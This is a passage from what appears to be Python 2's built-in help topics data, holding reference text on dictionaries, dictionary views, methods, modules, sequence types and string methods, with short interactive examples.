Class method objects are created\n by the built-in "classmethod()" constructor.\n', 'typesfunctions': u'\nFunctions\n*********\n\nFunction objects are created by function definitions. The only\noperation on a function object is to call it: "func(argument-list)".\n\nThere are really two flavors of function objects: built-in functions\nand user-defined functions. Both support the same operation (to call\nthe function), but the implementation is different, hence the\ndifferent object types.\n\nSee Function definitions for more information.\n', 'typesmapping': u'\nMapping Types --- "dict"\n************************\n\nA *mapping* object maps *hashable* values to arbitrary objects.\nMappings are mutable objects. There is currently only one standard\nmapping type, the *dictionary*. (For other containers see the built\nin "list", "set", and "tuple" classes, and the "collections" module.)\n\nA dictionary\'s keys are *almost* arbitrary values. Values that are\nnot *hashable*, that is, values containing lists, dictionaries or\nother mutable types (that are compared by value rather than by object\nidentity) may not be used as keys. Numeric types used for keys obey\nthe normal rules for numeric comparison: if two numbers compare equal\n(such as "1" and "1.0") then they can be used interchangeably to index\nthe same dictionary entry. (Note however, that since computers store\nfloating-point numbers as approximations it is usually unwise to use\nthem as dictionary keys.)\n\nDictionaries can be created by placing a comma-separated list of "key:\nvalue" pairs within braces, for example: "{\'jack\': 4098, \'sjoerd\':\n4127}" or "{4098: \'jack\', 4127: \'sjoerd\'}", or by the "dict"\nconstructor.\n\nclass dict(**kwarg)\nclass dict(mapping, **kwarg)\nclass dict(iterable, **kwarg)\n\n Return a new dictionary initialized from an optional positional\n argument and a possibly empty set of keyword arguments.\n\n If no positional argument is given, an empty dictionary is created.\n If a positional argument is given and it is a mapping object, a\n dictionary is created with the same key-value pairs as the mapping\n object. Otherwise, the positional argument must be an *iterable*\n object. Each item in the iterable must itself be an iterable with\n exactly two objects. The first object of each item becomes a key\n in the new dictionary, and the second object the corresponding\n value. If a key occurs more than once, the last value for that key\n becomes the corresponding value in the new dictionary.\n\n If keyword arguments are given, the keyword arguments and their\n values are added to the dictionary created from the positional\n argument. If a key being added is already present, the value from\n the keyword argument replaces the value from the positional\n argument.\n\n To illustrate, the following examples all return a dictionary equal\n to "{"one": 1, "two": 2, "three": 3}":\n\n >>> a = dict(one=1, two=2, three=3)\n >>> b = {\'one\': 1, \'two\': 2, \'three\': 3}\n >>> c = dict(zip([\'one\', \'two\', \'three\'], [1, 2, 3]))\n >>> d = dict([(\'two\', 2), (\'one\', 1), (\'three\', 3)])\n >>> e = dict({\'three\': 3, \'one\': 1, \'two\': 2})\n >>> a == b == c == d == e\n True\n\n Providing keyword arguments as in the first example only works for\n keys that are valid Python identifiers. 
Otherwise, any valid keys\n can be used.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for building a dictionary from\n keyword arguments added.\n\n These are the operations that dictionaries support (and therefore,\n custom mapping types should support too):\n\n len(d)\n\n Return the number of items in the dictionary *d*.\n\n d[key]\n\n Return the item of *d* with key *key*. Raises a "KeyError" if\n *key* is not in the map.\n\n If a subclass of dict defines a method "__missing__()" and *key*\n is not present, the "d[key]" operation calls that method with\n the key *key* as argument. The "d[key]" operation then returns\n or raises whatever is returned or raised by the\n "__missing__(key)" call. No other operations or methods invoke\n "__missing__()". If "__missing__()" is not defined, "KeyError"\n is raised. "__missing__()" must be a method; it cannot be an\n instance variable:\n\n >>> class Counter(dict):\n ... def __missing__(self, key):\n ... return 0\n >>> c = Counter()\n >>> c[\'red\']\n 0\n >>> c[\'red\'] += 1\n >>> c[\'red\']\n 1\n\n The example above shows part of the implementation of\n "collections.Counter". A different "__missing__" method is used\n by "collections.defaultdict".\n\n New in version 2.5: Recognition of __missing__ methods of dict\n subclasses.\n\n d[key] = value\n\n Set "d[key]" to *value*.\n\n del d[key]\n\n Remove "d[key]" from *d*. Raises a "KeyError" if *key* is not\n in the map.\n\n key in d\n\n Return "True" if *d* has a key *key*, else "False".\n\n New in version 2.2.\n\n key not in d\n\n Equivalent to "not key in d".\n\n New in version 2.2.\n\n iter(d)\n\n Return an iterator over the keys of the dictionary. This is a\n shortcut for "iterkeys()".\n\n clear()\n\n Remove all items from the dictionary.\n\n copy()\n\n Return a shallow copy of the dictionary.\n\n fromkeys(seq[, value])\n\n Create a new dictionary with keys from *seq* and values set to\n *value*.\n\n "fromkeys()" is a class method that returns a new dictionary.\n *value* defaults to "None".\n\n New in version 2.3.\n\n get(key[, default])\n\n Return the value for *key* if *key* is in the dictionary, else\n *default*. If *default* is not given, it defaults to "None", so\n that this method never raises a "KeyError".\n\n has_key(key)\n\n Test for the presence of *key* in the dictionary. "has_key()"\n is deprecated in favor of "key in d".\n\n items()\n\n Return a copy of the dictionary\'s list of "(key, value)" pairs.\n\n **CPython implementation detail:** Keys and values are listed in\n an arbitrary order which is non-random, varies across Python\n implementations, and depends on the dictionary\'s history of\n insertions and deletions.\n\n If "items()", "keys()", "values()", "iteritems()", "iterkeys()",\n and "itervalues()" are called with no intervening modifications\n to the dictionary, the lists will directly correspond. This\n allows the creation of "(value, key)" pairs using "zip()":\n "pairs = zip(d.values(), d.keys())". The same relationship\n holds for the "iterkeys()" and "itervalues()" methods: "pairs =\n zip(d.itervalues(), d.iterkeys())" provides the same value for\n "pairs". 
Another way to create the same list is "pairs = [(v, k)\n for (k, v) in d.iteritems()]".\n\n iteritems()\n\n Return an iterator over the dictionary\'s "(key, value)" pairs.\n See the note for "dict.items()".\n\n Using "iteritems()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n iterkeys()\n\n Return an iterator over the dictionary\'s keys. See the note for\n "dict.items()".\n\n Using "iterkeys()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n itervalues()\n\n Return an iterator over the dictionary\'s values. See the note\n for "dict.items()".\n\n Using "itervalues()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n keys()\n\n Return a copy of the dictionary\'s list of keys. See the note\n for "dict.items()".\n\n pop(key[, default])\n\n If *key* is in the dictionary, remove it and return its value,\n else return *default*. If *default* is not given and *key* is\n not in the dictionary, a "KeyError" is raised.\n\n New in version 2.3.\n\n popitem()\n\n Remove and return an arbitrary "(key, value)" pair from the\n dictionary.\n\n "popitem()" is useful to destructively iterate over a\n dictionary, as often used in set algorithms. If the dictionary\n is empty, calling "popitem()" raises a "KeyError".\n\n setdefault(key[, default])\n\n If *key* is in the dictionary, return its value. If not, insert\n *key* with a value of *default* and return *default*. *default*\n defaults to "None".\n\n update([other])\n\n Update the dictionary with the key/value pairs from *other*,\n overwriting existing keys. Return "None".\n\n "update()" accepts either another dictionary object or an\n iterable of key/value pairs (as tuples or other iterables of\n length two). If keyword arguments are specified, the dictionary\n is then updated with those key/value pairs: "d.update(red=1,\n blue=2)".\n\n Changed in version 2.4: Allowed the argument to be an iterable\n of key/value pairs and allowed keyword arguments.\n\n values()\n\n Return a copy of the dictionary\'s list of values. See the note\n for "dict.items()".\n\n viewitems()\n\n Return a new view of the dictionary\'s items ("(key, value)"\n pairs). See below for documentation of view objects.\n\n New in version 2.7.\n\n viewkeys()\n\n Return a new view of the dictionary\'s keys. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n viewvalues()\n\n Return a new view of the dictionary\'s values. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n Dictionaries compare equal if and only if they have the same "(key,\n value)" pairs.\n\n\nDictionary view objects\n=======================\n\nThe objects returned by "dict.viewkeys()", "dict.viewvalues()" and\n"dict.viewitems()" are *view objects*. 
They provide a dynamic view on\nthe dictionary\'s entries, which means that when the dictionary\nchanges, the view reflects these changes.\n\nDictionary views can be iterated over to yield their respective data,\nand support membership tests:\n\nlen(dictview)\n\n Return the number of entries in the dictionary.\n\niter(dictview)\n\n Return an iterator over the keys, values or items (represented as\n tuples of "(key, value)") in the dictionary.\n\n Keys and values are iterated over in an arbitrary order which is\n non-random, varies across Python implementations, and depends on\n the dictionary\'s history of insertions and deletions. If keys,\n values and items views are iterated over with no intervening\n modifications to the dictionary, the order of items will directly\n correspond. This allows the creation of "(value, key)" pairs using\n "zip()": "pairs = zip(d.values(), d.keys())". Another way to\n create the same list is "pairs = [(v, k) for (k, v) in d.items()]".\n\n Iterating views while adding or deleting entries in the dictionary\n may raise a "RuntimeError" or fail to iterate over all entries.\n\nx in dictview\n\n Return "True" if *x* is in the underlying dictionary\'s keys, values\n or items (in the latter case, *x* should be a "(key, value)"\n tuple).\n\nKeys views are set-like since their entries are unique and hashable.\nIf all values are hashable, so that (key, value) pairs are unique and\nhashable, then the items view is also set-like. (Values views are not\ntreated as set-like since the entries are generally not unique.) Then\nthese set operations are available ("other" refers either to another\nview or a set):\n\ndictview & other\n\n Return the intersection of the dictview and the other object as a\n new set.\n\ndictview | other\n\n Return the union of the dictview and the other object as a new set.\n\ndictview - other\n\n Return the difference between the dictview and the other object\n (all elements in *dictview* that aren\'t in *other*) as a new set.\n\ndictview ^ other\n\n Return the symmetric difference (all elements either in *dictview*\n or *other*, but not in both) of the dictview and the other object\n as a new set.\n\nAn example of dictionary view usage:\n\n >>> dishes = {\'eggs\': 2, \'sausage\': 1, \'bacon\': 1, \'spam\': 500}\n >>> keys = dishes.viewkeys()\n >>> values = dishes.viewvalues()\n\n >>> # iteration\n >>> n = 0\n >>> for val in values:\n ... n += val\n >>> print(n)\n 504\n\n >>> # keys and values are iterated over in the same order\n >>> list(keys)\n [\'eggs\', \'bacon\', \'sausage\', \'spam\']\n >>> list(values)\n [2, 1, 1, 500]\n\n >>> # view objects are dynamic and reflect dict changes\n >>> del dishes[\'eggs\']\n >>> del dishes[\'sausage\']\n >>> list(keys)\n [\'spam\', \'bacon\']\n\n >>> # set operations\n >>> keys & {\'eggs\', \'bacon\', \'salad\'}\n {\'bacon\'}\n', 'typesmethods': u'\nMethods\n*******\n\nMethods are functions that are called using the attribute notation.\nThere are two flavors: built-in methods (such as "append()" on lists)\nand class instance methods. 
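For example, in CPython:\n\n >>> type([].append)\n <type \'builtin_function_or_method\'>\n >>> class C:\n ... def m(self):\n ... pass\n ...\n >>> type(C().m)\n <type \'instancemethod\'>\n\n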
Built-in methods are described with the\ntypes that support them.\n\nThe implementation adds two special read-only attributes to class\ninstance methods: "m.im_self" is the object on which the method\noperates, and "m.im_func" is the function implementing the method.\nCalling "m(arg-1, arg-2, ..., arg-n)" is completely equivalent to\ncalling "m.im_func(m.im_self, arg-1, arg-2, ..., arg-n)".\n\nClass instance methods are either *bound* or *unbound*, referring to\nwhether the method was accessed through an instance or a class,\nrespectively. When a method is unbound, its "im_self" attribute will\nbe "None" and if called, an explicit "self" object must be passed as\nthe first argument. In this case, "self" must be an instance of the\nunbound method\'s class (or a subclass of that class), otherwise a\n"TypeError" is raised.\n\nLike function objects, method objects support getting arbitrary\nattributes. However, since method attributes are actually stored on\nthe underlying function object ("meth.im_func"), setting method\nattributes on either bound or unbound methods is disallowed.\nAttempting to set an attribute on a method results in an\n"AttributeError" being raised. In order to set a method attribute,\nyou need to explicitly set it on the underlying function object:\n\n >>> class C:\n ... def method(self):\n ... pass\n ...\n >>> c = C()\n >>> c.method.whoami = \'my name is method\' # can\'t set on the method\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n AttributeError: \'instancemethod\' object has no attribute \'whoami\'\n >>> c.method.im_func.whoami = \'my name is method\'\n >>> c.method.whoami\n \'my name is method\'\n\nSee The standard type hierarchy for more information.\n', 'typesmodules': u'\nModules\n*******\n\nThe only special operation on a module is attribute access: "m.name",\nwhere *m* is a module and *name* accesses a name defined in *m*\'s\nsymbol table. Module attributes can be assigned to. (Note that the\n"import" statement is not, strictly speaking, an operation on a module\nobject; "import foo" does not require a module object named *foo* to\nexist, rather it requires an (external) *definition* for a module\nnamed *foo* somewhere.)\n\nA special attribute of every module is "__dict__". This is the\ndictionary containing the module\'s symbol table. Modifying this\ndictionary will actually change the module\'s symbol table, but direct\nassignment to the "__dict__" attribute is not possible (you can write\n"m.__dict__[\'a\'] = 1", which defines "m.a" to be "1", but you can\'t\nwrite "m.__dict__ = {}"). Modifying "__dict__" directly is not\nrecommended.\n\nModules built into the interpreter are written like this: "<module\n\'sys\' (built-in)>". If loaded from a file, they are written as\n"<module \'os\' from \'/usr/local/lib/pythonX.Y/os.pyc\'>".\n', 'typesseq': u'\nSequence Types --- "str", "unicode", "list", "tuple", "bytearray", "buffer", "xrange"\n*************************************************************************************\n\nThere are seven sequence types: strings, Unicode strings, lists,\ntuples, bytearrays, buffers, and xrange objects.\n\nFor other containers see the built in "dict" and "set" classes, and\nthe "collections" module.\n\nString literals are written in single or double quotes: "\'xyzzy\'",\n""frobozz"". See String literals for more about string literals.\nUnicode strings are much like strings, but are specified in the syntax\nusing a preceding "\'u\'" character: "u\'abc\'", "u"def"". 
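For example:\n\n >>> type(\'abc\'), type(u\'abc\')\n (<type \'str\'>, <type \'unicode\'>)\n >>> \'abc\' == u\'abc\'\n True\n\n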
In addition to\nthe functionality described here, there are also string-specific\nmethods described in the String Methods section. Lists are constructed\nwith square brackets, separating items with commas: "[a, b, c]".\nTuples are constructed by the comma operator (not within square\nbrackets), with or without enclosing parentheses, but an empty tuple\nmust have the enclosing parentheses, such as "a, b, c" or "()". A\nsingle item tuple must have a trailing comma, such as "(d,)".\n\nBytearray objects are created with the built-in function\n"bytearray()".\n\nBuffer objects are not directly supported by Python syntax, but can be\ncreated by calling the built-in function "buffer()". They don\'t\nsupport concatenation or repetition.\n\nObjects of type xrange are similar to buffers in that there is no\nspecific syntax to create them, but they are created using the\n"xrange()" function. They don\'t support slicing, concatenation or\nrepetition, and using "in", "not in", "min()" or "max()" on them is\ninefficient.\n\nMost sequence types support the following operations. The "in" and\n"not in" operations have the same priorities as the comparison\noperations. The "+" and "*" operations have the same priority as the\ncorresponding numeric operations. [3] Additional methods are provided\nfor Mutable Sequence Types.\n\nThis table lists the sequence operations sorted in ascending priority.\nIn the table, *s* and *t* are sequences of the same type; *n*, *i* and\n*j* are integers:\n\n+--------------------+----------------------------------+------------+\n| Operation | Result | Notes |\n+====================+==================================+============+\n| "x in s" | "True" if an item of *s* is | (1) |\n| | equal to *x*, else "False" | |\n+--------------------+----------------------------------+------------+\n| "x not in s" | "False" if an item of *s* is | (1) |\n| | equal to *x*, else "True" | |\n+--------------------+----------------------------------+------------+\n| "s + t" | the concatenation of *s* and *t* | (6) |\n+--------------------+----------------------------------+------------+\n| "s * n, n * s" | equivalent to adding *s* to | (2) |\n| | itself *n* times | |\n+--------------------+----------------------------------+------------+\n| "s[i]" | *i*th item of *s*, origin 0 | (3) |\n+--------------------+----------------------------------+------------+\n| "s[i:j]" | slice of *s* from *i* to *j* | (3)(4) |\n+--------------------+----------------------------------+------------+\n| "s[i:j:k]" | slice of *s* from *i* to *j* | (3)(5) |\n| | with step *k* | |\n+--------------------+----------------------------------+------------+\n| "len(s)" | length of *s* | |\n+--------------------+----------------------------------+------------+\n| "min(s)" | smallest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "max(s)" | largest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "s.index(x)" | index of the first occurrence of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n| "s.count(x)" | total number of occurrences of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n\nSequence types also support comparisons. In particular, tuples and\nlists are compared lexicographically by comparing corresponding\nelements. 
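For example:\n\n >>> (1, 2, 3) < (1, 2, 4)\n True\n >>> [1, 2] < [1, 2, 3]\n True\n >>> (1, 2) == [1, 2]\n False\n\n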
This means that to compare equal, every element must compare\nequal and the two sequences must be of the same type and have the same\nlength. (For full details see Comparisons in the language reference.)\n\nNotes:\n\n1. When *s* is a string or Unicode string object the "in" and "not\n in" operations act like a substring test. In Python versions\n before 2.3, *x* had to be a string of length 1. In Python 2.3 and\n beyond, *x* may be a string of any length.\n\n2. Values of *n* less than "0" are treated as "0" (which yields an\n empty sequence of the same type as *s*). Note that items in the\n sequence *s* are not copied; they are referenced multiple times.\n This often haunts new Python programmers; consider:\n\n >>> lists = [[]] * 3\n >>> lists\n [[], [], []]\n >>> lists[0].append(3)\n >>> lists\n [[3], [3], [3]]\n\n What has happened is that "[[]]" is a one-element list containing\n an empty list, so all three elements of "[[]] * 3" are references\n to this single empty list. Modifying any of the elements of\n "lists" modifies this single list. You can create a list of\n different lists this way:\n\n >>> lists = [[] for i in range(3)]\n >>> lists[0].append(3)\n >>> lists[1].append(5)\n >>> lists[2].append(7)\n >>> lists\n [[3], [5], [7]]\n\n Further explanation is available in the FAQ entry How do I create a\n multidimensional list?.\n\n3. If *i* or *j* is negative, the index is relative to the end of\n the string: "len(s) + i" or "len(s) + j" is substituted. But note\n that "-0" is still "0".\n\n4. The slice of *s* from *i* to *j* is defined as the sequence of\n items with index *k* such that "i <= k < j". If *i* or *j* is\n greater than "len(s)", use "len(s)". If *i* is omitted or "None",\n use "0". If *j* is omitted or "None", use "len(s)". If *i* is\n greater than or equal to *j*, the slice is empty.\n\n5. The slice of *s* from *i* to *j* with step *k* is defined as the\n sequence of items with index "x = i + n*k" such that "0 <= n <\n (j-i)/k". In other words, the indices are "i", "i+k", "i+2*k",\n "i+3*k" and so on, stopping when *j* is reached (but never\n including *j*). If *i* or *j* is greater than "len(s)", use\n "len(s)". If *i* or *j* are omitted or "None", they become "end"\n values (which end depends on the sign of *k*). Note, *k* cannot be\n zero. If *k* is "None", it is treated like "1".\n\n6. **CPython implementation detail:** If *s* and *t* are both\n strings, some Python implementations such as CPython can usually\n perform an in-place optimization for assignments of the form "s = s\n + t" or "s += t". When applicable, this optimization makes\n quadratic run-time much less likely. This optimization is both\n version and implementation dependent. For performance sensitive\n code, it is preferable to use the "str.join()" method which assures\n consistent linear concatenation performance across versions and\n implementations.\n\n Changed in version 2.4: Formerly, string concatenation never\n occurred in-place.\n\n\nString Methods\n==============\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. 
Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. 
Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01 012 0123 01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01 012 0123 01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). 
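For example:\n\n >>> \'ab\'.ljust(6, \'-\')\n \'ab----\'\n\n 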
The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.lstrip()\n \'spacious \'\n >>> \'www.example.com\'.lstrip(\'cmowz.\')\n \'example.com\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.rstrip()\n \' spacious\'\n >>> \'mississippi\'.rstrip(\'ipz\')\n \'mississ\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. 
If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The *sep* argument\n may consist of multiple characters (for example,\n "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). Splitting an\n empty string with a specified separator returns "[\'\']".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\' 1 2 3 \'.split()" returns "[\'1\', \'2\', \'3\']", and\n "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 \']".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n c\', \'\', \'de fg\', \'kl\']", while the same call with\n "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de fg\\r\', \'kl\\r\\n\']".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \' spacious \'.strip()\n \'spacious\'\n >>> \'www.example.com\'.strip(\'cmowz.\')\n \'example\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. 
The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \'read this short text\'.translate(None, \'aeiou\')\n \'rd ths shrt txt\'\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module 